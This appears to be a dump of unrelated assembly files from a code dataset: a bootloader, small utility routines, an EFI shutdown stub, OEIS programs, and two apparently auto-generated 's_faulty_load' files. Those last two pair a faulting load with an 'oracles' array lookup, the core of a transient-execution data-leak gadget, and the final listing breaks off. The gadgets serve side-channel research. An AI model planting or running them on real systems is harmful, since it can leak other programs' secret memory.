; 遵守c语言的规范: 堆栈谁调用谁清理
; 显示位置放在当前显示的数字后面,不负责换行
; ------------------------------------------------------------------------
DispInt:
mov eax, [esp + 4]
shr eax, 24
call DispAL
mov eax, [esp + 4]
shr eax, 16
call DispAL
mov eax, [esp + 4]
shr eax, 8
call DispAL
mov eax, [esp + 4]
call DispAL
mov ah, 07h ; 0000b: 黑底 0111b: 灰字
mov al, 'h'
push edi
mov edi, [Disp_Pos]
mov [gs:edi], ax
add edi, 4
mov [Disp_Pos], edi
pop edi
ret
; DispInt 结束------------------------------------------------------------
; ------------------------------------------------------------------------
; DispStr
; 显示一个字符串
; 通过堆栈传递一个4字节字符串起始位置变量
; 字符串结尾用0来标识
; ------------------------------------------------------------------------
DispStr:
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp + 8]
mov edi, [Disp_Pos]
mov ah, 0Fh
display_char:
lodsb
test al, al ;test指令对符号位的影响和and指令相同
jz disp_end ;判断字符串是否已经显示完
cmp al, 0Ah ; 判断当前字符是否为回车
jnz disp_return
push eax
mov eax, edi
mov bl, 160
div bl
and eax, 0FFh
inc eax
mov bl, 160
mul bl
mov edi, eax
pop eax
jmp display_char
disp_return:
mov [gs:edi], ax
add edi, 2
jmp display_char
disp_end:
mov [Disp_Pos], edi
pop edi
pop esi
pop ebx
pop ebp
ret
; DispStr 结束------------------------------------------------------------
; ------------------------------------------------------------------------
; DispReturn
; 调用后切换到下一行
; ------------------------------------------------------------------------
DispReturn:
push Char_Return
call DispStr ;printf("\n");
add esp, 4
ret
; DispReturn 结束---------------------------------------------------------
; ------------------------------------------------------------------------
; 内存拷贝,仿 memcpy
; void* MemCpy(void* es:pDest, void* ds:pSrc, int iSize);
; ------------------------------------------------------------------------
MemCpy:
push ebp
mov ebp, esp
push esi
push edi
push ecx
mov edi, [ebp + 8] ; Destination
mov esi, [ebp + 12] ; Source
mov ecx, [ebp + 16] ; Counter
transfer:
cmp ecx, 0
jz transfer_end
;逐字节移动内存
mov al, [ds:esi]
inc esi
mov byte [es:edi], al
inc edi
dec ecx
jmp transfer
transfer_end:
mov eax, [ebp + 8] ; 返回值
pop ecx
pop edi
pop esi
mov esp, ebp
pop ebp
ret
; MemCpy 结束-------------------------------------------------------------
; 显示内存信息 --------------------------------------------------------------
; DispMemInfo 显示内存信息
; -----------------------------------------------------------------------------------
DispMemInfo:
push esi
push edi
push ecx
push Mem_Info_Title
call DispStr
add esp, 4
mov esi, Mem_Check_Buf
mov ecx, [Mem_Check_Result_Number]
display_entry:
mov edx, 5
mov edi, ARDStruct
fill_the_ARDStruct:
;填充数据结构
;每填充一个成员就显示出来
push dword [esi]
call DispInt
pop eax
stosd
add esi, 4
dec edx
cmp edx, 0
jnz fill_the_ARDStruct
call DispReturn
; 根据当前entry的类型显示不同内容
cmp dword [ARD_Type], 1
jne next_entry
mov eax, [ARD_Base_L]
add eax, [ARD_Length_L]
cmp eax, [Mem_Size]
jb next_entry
mov [Mem_Size], eax
next_entry:
loop display_entry
push RAM_Size_Title
call DispStr
add esp, 4
push dword [Mem_Size]
call DispInt
add esp, 4
pop ecx
pop edi
pop esi
ret
; ---------------------------------------------------------------------------
; 启动分页机制 --------------------------------------------------------------
; 其实感觉根据内存大小分配页表有些鸡肋,毕竟不缺那一点空间
SetupPaging:
; 根据内存大小计算应初始化多少PDE以及多少页表
xor edx, edx
mov eax, [Mem_Size]
mov ebx, 400000h ; 400000h = 4M = 4096 * 1024, 一个页表对应的内存大小
div ebx
mov ecx, eax ; 此时 ecx 为页表的个数,也即 PDE 应该的个数
test edx, edx
jz no_remainder ; 没有余数,直接跳转到下一步
inc ecx ; 如果余数不为 0 就需增加一个页表
no_remainder:
push ecx ; 暂存页表个数
; 为简化处理, 所有线性地址对应相等的物理地址. 并且不考虑内存空洞.
; 首先初始化页目录
mov ax, SelectorFlatRW
mov es, ax
mov edi, Page_Dir_Base ; 此段首地址为 Page_Dir_Base
xor eax, eax
mov eax, Page_Table_BASE | PG_P | PG_USU | PG_RWW
init_page_dir:
stosd
add eax, 4096 ; 为了简化, 所有页表在内存中是连续的.
loop init_page_dir
; 再初始化所有页表
pop eax ; 页表个数
mov ebx, 1024 ; 每个页表 1024 个 PTE
mul ebx
mov ecx, eax ; PTE个数 = 页表个数 * 1024
mov edi, Page_Table_BASE ; 此段首地址为 PAGE_TBL_BASE
xor eax, eax
mov eax, PG_P | PG_USU | PG_RWW
init_page_table:
stosd
add eax, 4096 ; 每一页指向 4K 的空间
loop init_page_table
mov eax, Page_Dir_Base
mov cr3, eax
mov eax, cr0
or eax, 80000000h
mov cr0, eax
jmp short init_page_end
init_page_end:
nop
ret
; 分页机制启动完毕 ----------------------------------------------------------
; InitKernel ---------------------------------------------------------------------------------
; 将 KERNEL.BIN 的内容经过整理对齐后放到新的位置
; --------------------------------------------------------------------------------------------
InitKernel:
; 遍历每一个 Program Header,根据 Program Header 中的信息来确定把什么放进内存,放到什么位置,以及放多少。
xor esi, esi
mov cx, word [Kernel_File_Phy_Addr + ELF_Header_e_phnum]; ;Program Header Table中entry个数
movzx ecx, cx
mov esi, [Kernel_File_Phy_Addr + ELF_Header_e_phoff] ;Program Header Table 在文件中的偏移
add esi, Kernel_File_Phy_Addr ;Program Header Table 在内存中的偏移
deal_with_one_program_header_table_entry:
mov eax, [esi]
cmp eax, 0 ; 0 -> unused 1 -> loadable
jz init_next_section
push dword [esi + ELF_Program_Header_p_size] ; 获取section的大小
mov eax, [esi + ELF_Program_Header_p_offset] ; 获取section在文件中的偏移
add eax, Kernel_File_Phy_Addr ; 获取section在内存中的偏移
push eax ; section在内存中的源地址
push dword [esi +ELF_Program_Header_p_vaddr] ; section在内存中的目的地址
call MemCpy
add esp, 12 ; 恢复堆栈
init_next_section:
add esi, 020h ; 指向下一个 Program Header Table entry
dec ecx
jnz deal_with_one_program_header_table_entry
ret
; 堆栈就在32位代码段的末尾
Protect_Mode_Stack_Space: times 1000h db 0
Protect_Mode_Stack_Top equ Loader_Phy_Address + $
;堆栈段基址其实就是cs ds es 通用的以0x00为起始地址的段
;Stack_Base equ 0
| 22.808874 | 167 | 0.572048 |
a426ffdb3e49df1fcbe9776071dee21669317fd5 | 1,836 | asm | Assembly | uti/lintasc.asm | olifink/smsqe | c546d882b26566a46d71820d1539bed9ea8af108 | [
"BSD-2-Clause"
] | null | null | null | uti/lintasc.asm | olifink/smsqe | c546d882b26566a46d71820d1539bed9ea8af108 | [
"BSD-2-Clause"
] | null | null | null | uti/lintasc.asm | olifink/smsqe | c546d882b26566a46d71820d1539bed9ea8af108 | [
"BSD-2-Clause"
] | null | null | null | ; Convert a long integer to ASCII into a buffer 1993 Jochen Merz
section utility
xdef ut_lintasc
;+++
; Convert a long integer to ASCII into a buffer. The maximum value
; is 999.999.999. A dirty way of doing it, but very quick.
;
; Entry Exit
; d1.l value length
; a1 ptr to buffer updated ptr to buffer
;---
ut_lintasc
lasc.reg reg d2-d3
movem.l lasc.reg,-(sp)
moveq #0,d2 ; character count
move.l #100000000,d3
bsr.s try_div
move.l #10000000,d3
bsr.s try_div
move.l #1000000,d3
bsr.s try_div
move.l #100000,d3
bsr.s try_div
move.l #10000,d3
bsr.s try_div
move.l #1000,d3
bsr.s try_div
moveq #100,d3
bsr.s try_div
moveq #10,d3
bsr.s try_div
add.b #'0',d1
addq.b #1,d2
move.b d1,(a1)+
move.l d2,d1
movem.l (sp)+,d2-d3
rts
try_div
cmp.l d3,d1 ; value larger than digit?
blt.s no_div ; no!
moveq #'0',d0 ; reset character/counter
try_loop
addq.b #1,d0
sub.l d3,d1
cmp.l d3,d1 ; still bigger?
bge.s try_loop ; yes, try again!
addq.b #1,d2 ; another digit
move.b d0,(a1)+ ; insert character
rts
no_div
tst.b d2 ; any character in buffer?
beq.s no_char ; no!
addq.b #1,d2 ; otherwise 0 must be buffered
move.b #'0',(a1)+
no_char
rts
end
| 29.142857 | 73 | 0.441176 |
38b135268896aeeebc035c9b173f17eaad273895 | 176 | asm | Assembly | sbsext/ut/errbp.asm | olifink/smsqe | c546d882b26566a46d71820d1539bed9ea8af108 | [
"BSD-2-Clause"
] | null | null | null | sbsext/ut/errbp.asm | olifink/smsqe | c546d882b26566a46d71820d1539bed9ea8af108 | [
"BSD-2-Clause"
] | null | null | null | sbsext/ut/errbp.asm | olifink/smsqe | c546d882b26566a46d71820d1539bed9ea8af108 | [
"BSD-2-Clause"
] | null | null | null | * set error - Bad parameter
*
section utils
*
xdef err_bp
*
include dev8_sbsext_ext_keys
*
err_bp
moveq #err.bp,d0
rts
end
| 13.538462 | 36 | 0.528409 |
7c0e725a9904869a06c78637521fab90d392c772 | 2,309 | asm | Assembly | main.asm | microwave89-hv/te-sound-barrier | e73fd1f26b093dbcd0d4eef7539f4fbfd589b26a | [
"Apache-2.0"
] | null | null | null | main.asm | microwave89-hv/te-sound-barrier | e73fd1f26b093dbcd0d4eef7539f4fbfd589b26a | [
"Apache-2.0"
] | null | null | null | main.asm | microwave89-hv/te-sound-barrier | e73fd1f26b093dbcd0d4eef7539f4fbfd589b26a | [
"Apache-2.0"
] | null | null | null | ; Copyright (c) 2020 microwave89-hv
;
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
; http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.
; Derived from actual TE file in SPI ROM dump of MBP101.00F6.B00 starting at offset 0x7ff33c,
; with help of the Intel® Platform Innovation Framework for EFI Pre-EFI Initialization Core Interface Specification (PEI CIS) 0.91,
; and the Extensible Firmware Interface Specification V 1.10.
; Thanks go to @Intel for creating and publishing those specifications.
BITS 64
EFI_TE_IMAGE_HEADER_SIGNATURE equ 0x5A56 ; 'VZ' ; Magic for Terse Executables
IMAGE_FILE_MACHINE_AMD64 equ 0x8664
IMAGE_SUBSYSTEM_EFI_APPLICATION equ 0xa ; EFI app
EfiResetShutdown equ 2 ; In C this would be of type long
size_of_te_hdr equ 0x28 ; Inofficial...
Signature: dw EFI_TE_IMAGE_HEADER_SIGNATURE ; 56 5A
Machine: dw IMAGE_FILE_MACHINE_AMD64 ; 64 86
NumberOfSections: db 0 ; 00 ; Don't interpret a section header any longer, this permits one finally
; to put code in all of the fields of the former section header.
Subsystem: db IMAGE_SUBSYSTEM_EFI_APPLICATION ; 0A
StrippedSize: dw 0x2d9 ; d9 02 ; Needed to adjust address of AddressOfEntryPoint to AddressOfEntryPoint
AddressOfEntryPoint: mov ecx, 2
nop
jmp DataDirectory0_Va ; EB 08 ; Skip non-executable ImageBase
ImageBase: dq 0xffffffffffffffff ; 00 10 00 00 05 60 00 00 ; On my system this region is read-writeable. This might not hold true with your's.
DataDirectory0_Va:
push qword [rdx + 0x58] ; 59 ; arg1 = var1;
mov edx, 0 ; 90
DataDirectory1_Va:
pop rax ; 31 D2 ; arg2 = EFI_SUCCESS;
call [rax + 0x68]
; 56 5A 64 86 00 0A D9 02 B9 02 00 00 00 90 EB 08 FF FF FF FF FF FF FF FF FF 72 58 BA 00 00 00 00 58 FF 50 68
| 48.104167 | 149 | 0.716761 |
f2e9917a38c5335bb4d5c733cf3ef163dce29695 | 373 | asm | Assembly | programs/oeis/176/A176835.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/176/A176835.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/176/A176835.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A176835: Number of positive integers k for which k^2 - n*k is a square.
; 1,1,2,1,2,2,2,2,3,2,2,2,2,2,5,3,2,3,2,2,5,2,2,5,3,2,4,2,2,5,2,4,5,2,5,3,2,2,5,5,2,5,2,2,8,2,2,8,3,3,5,2,2,4,5,5,5,2,2,5,2,2,8,5,5,5,2,2,5,5,2,8,2,2,8,2,5,5,2,8,5,2,2,5,5,2,5,5,2,8,5,2,5,2,5,11,2,3,8,3
add $0,1
dif $0,2
sub $0,1
seq $0,46079 ; Number of Pythagorean triangles with leg n.
add $0,1
| 41.444444 | 202 | 0.587131 |
621c5d7c8a65b9e53aef08fabde2b2335fe0890c | 519 | asm | Assembly | oeis/140/A140525.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/140/A140525.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/140/A140525.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A140525: a(1)=2. For n >=2, a(n) = the least integer >= a(n-1) that is not coprime to both a(n-1)+1 and a(n-1).
; Submitted by Jon Maiga
; 2,6,14,18,38,42,86,90,98,102,206,210,422,426,434,438,878,882,1766,1770,1778,1782,3566,3570,7142,7146,7154,7158,14318,14322,28646,28650,28658,28662,57326,57330,114662,114666,114674,114678,229358,229362,229400
mov $2,1
lpb $0
mov $3,$2
lpb $3
add $2,1
mov $4,$3
gcd $4,$2
sub $4,1
cmp $4,0
sub $3,$4
lpe
sub $0,1
add $2,1
lpe
mov $0,$2
mul $0,2
| 24.714286 | 209 | 0.626204 |
ef0cdd9ea049790d3f24844c0266e96872f26430 | 215 | asm | Assembly | Lab Assessment Submission/Lab 2/lab2,1620106042.asm | Rupak95/CSE331L-Section-10-Fall20-NSU | b7182cb9aff02feb3d9eec9e24c25630ba29716d | [
"MIT"
] | null | null | null | Lab Assessment Submission/Lab 2/lab2,1620106042.asm | Rupak95/CSE331L-Section-10-Fall20-NSU | b7182cb9aff02feb3d9eec9e24c25630ba29716d | [
"MIT"
] | null | null | null | Lab Assessment Submission/Lab 2/lab2,1620106042.asm | Rupak95/CSE331L-Section-10-Fall20-NSU | b7182cb9aff02feb3d9eec9e24c25630ba29716d | [
"MIT"
] | null | null | null |
; You may customize this and other start-up templates;
; The location of this template is c:\emu8086\inc\0_com_template.txt
org 100h
K1 EQU 6
K2 EQU 5
K3 EQU 5
MOV AX, K1
ADD AX, K2
ADD AX, K3
ADD BX,AX
ret
| 11.315789 | 68 | 0.716279 |
b981e78bda37473315141e7718ac54c6cfee9815 | 6,690 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_1489.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_1489.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_1489.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %r12
push %r8
push %r9
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0x1ec39, %r12
and $5392, %r9
movb $0x61, (%r12)
nop
nop
xor %r11, %r11
lea addresses_D_ht+0xb679, %rdi
nop
sub %rsi, %rsi
mov (%rdi), %r12d
nop
nop
nop
inc %rdi
lea addresses_A_ht+0x4439, %rsi
lea addresses_WC_ht+0x1e709, %rdi
clflush (%rdi)
nop
nop
nop
nop
xor %r11, %r11
mov $3, %rcx
rep movsl
cmp %r12, %r12
lea addresses_WC_ht+0x18839, %rsi
lea addresses_WT_ht+0x14439, %rdi
clflush (%rsi)
nop
nop
nop
xor %r8, %r8
mov $81, %rcx
rep movsl
nop
nop
nop
nop
inc %rsi
pop %rsi
pop %rdi
pop %rcx
pop %r9
pop %r8
pop %r12
pop %r11
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r14
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
// REPMOV
lea addresses_PSE+0x159c1, %rsi
lea addresses_UC+0x6c39, %rdi
nop
xor $46433, %r14
mov $68, %rcx
rep movsb
nop
dec %r14
// Store
lea addresses_UC+0x139, %rbp
clflush (%rbp)
nop
nop
nop
nop
sub $3581, %r12
movw $0x5152, (%rbp)
nop
nop
nop
nop
xor $16411, %rcx
// Store
lea addresses_normal+0x1e439, %r12
nop
nop
nop
and %rbp, %rbp
movw $0x5152, (%r12)
nop
add $11858, %rdi
// Store
lea addresses_D+0x1fcb1, %rbp
nop
and %rcx, %rcx
movw $0x5152, (%rbp)
nop
nop
nop
nop
nop
dec %rbp
// Store
lea addresses_WT+0x17abd, %rdx
nop
nop
nop
nop
nop
sub $32079, %r12
mov $0x5152535455565758, %rsi
movq %rsi, (%rdx)
nop
nop
nop
nop
add $19011, %r14
// Store
lea addresses_RW+0x19639, %rsi
nop
nop
nop
nop
nop
inc %r12
mov $0x5152535455565758, %rdi
movq %rdi, %xmm0
vmovups %ymm0, (%rsi)
nop
nop
nop
nop
xor %r14, %r14
// Load
lea addresses_RW+0xfe39, %rbp
nop
nop
nop
inc %r12
movb (%rbp), %dl
add %rdx, %rdx
// Faulty Load
lea addresses_RW+0xfe39, %rdi
nop
nop
nop
nop
nop
inc %rbp
mov (%rdi), %cx
lea oracles, %r12
and $0xff, %rcx
shlq $12, %rcx
mov (%r12,%rcx,1), %rcx
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %r14
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'src': {'type': 'addresses_RW', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 0}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_PSE', 'congruent': 2, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_UC', 'congruent': 8, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_UC', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 6}}
{'OP': 'STOR', 'dst': {'type': 'addresses_normal', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 6}}
{'OP': 'STOR', 'dst': {'type': 'addresses_D', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 3}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WT', 'AVXalign': False, 'size': 8, 'NT': False, 'same': False, 'congruent': 2}}
{'OP': 'STOR', 'dst': {'type': 'addresses_RW', 'AVXalign': False, 'size': 32, 'NT': False, 'same': False, 'congruent': 11}}
{'src': {'type': 'addresses_RW', 'AVXalign': False, 'size': 1, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'}
[Faulty Load]
{'src': {'type': 'addresses_RW', 'AVXalign': False, 'size': 2, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 9}}
{'src': {'type': 'addresses_D_ht', 'AVXalign': False, 'size': 4, 'NT': False, 'same': False, 'congruent': 3}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_A_ht', 'congruent': 9, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WC_ht', 'congruent': 1, 'same': True}}
{'src': {'type': 'addresses_WC_ht', 'congruent': 8, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WT_ht', 'congruent': 9, 'same': True}}
{'32': 21829}
32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32
*/
| 33.118812 | 2,999 | 0.653961 |
9d4a8db4ad7760650da0b72e9dbfe091a3240d5d | 5,212 | asm | Assembly | Transynther/x86/_processed/NC/_zr_/i3-7100_9_0x84_notsx.log_21829_2472.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NC/_zr_/i3-7100_9_0x84_notsx.log_21829_2472.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NC/_zr_/i3-7100_9_0x84_notsx.log_21829_2472.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r14
push %r8
push %rbp
push %rbx
push %rdi
push %rsi
// Load
lea addresses_D+0x348c, %r14
nop
nop
dec %r8
mov (%r14), %rsi
nop
nop
nop
sub $34009, %r11
// Load
lea addresses_UC+0x16cd0, %rdi
clflush (%rdi)
nop
nop
nop
nop
add $42617, %rbp
movb (%rdi), %r8b
nop
sub %rbx, %rbx
// Store
lea addresses_A+0x5a27, %rdi
add $31254, %rbp
mov $0x5152535455565758, %rbx
movq %rbx, (%rdi)
nop
nop
sub $44262, %r8
// Store
mov $0x36c, %rdi
nop
nop
nop
add $32689, %r11
mov $0x5152535455565758, %rbx
movq %rbx, %xmm2
movups %xmm2, (%rdi)
inc %rbx
// Store
lea addresses_US+0xa4b4, %r11
nop
nop
xor %r8, %r8
mov $0x5152535455565758, %rbx
movq %rbx, %xmm4
vmovups %ymm4, (%r11)
sub $28953, %r14
// Store
lea addresses_A+0x4f0, %r14
nop
and $42552, %rbp
movw $0x5152, (%r14)
nop
nop
nop
nop
sub %rbp, %rbp
// Faulty Load
mov $0x471e830000000cf0, %rbx
nop
nop
nop
add $7569, %r11
movups (%rbx), %xmm2
vpextrq $0, %xmm2, %r8
lea oracles, %rdi
and $0xff, %r8
shlq $12, %r8
mov (%rdi,%r8,1), %r8
pop %rsi
pop %rdi
pop %rbx
pop %rbp
pop %r8
pop %r14
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'src': {'type': 'addresses_NC', 'same': False, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_D', 'same': False, 'size': 8, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_UC', 'same': False, 'size': 1, 'congruent': 4, 'NT': True, 'AVXalign': False}, 'OP': 'LOAD'}
{'dst': {'type': 'addresses_A', 'same': False, 'size': 8, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_P', 'same': False, 'size': 16, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_US', 'same': False, 'size': 32, 'congruent': 1, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_A', 'same': False, 'size': 2, 'congruent': 11, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
[Faulty Load]
{'src': {'type': 'addresses_NC', 'same': True, 'size': 16, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'00': 21829}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 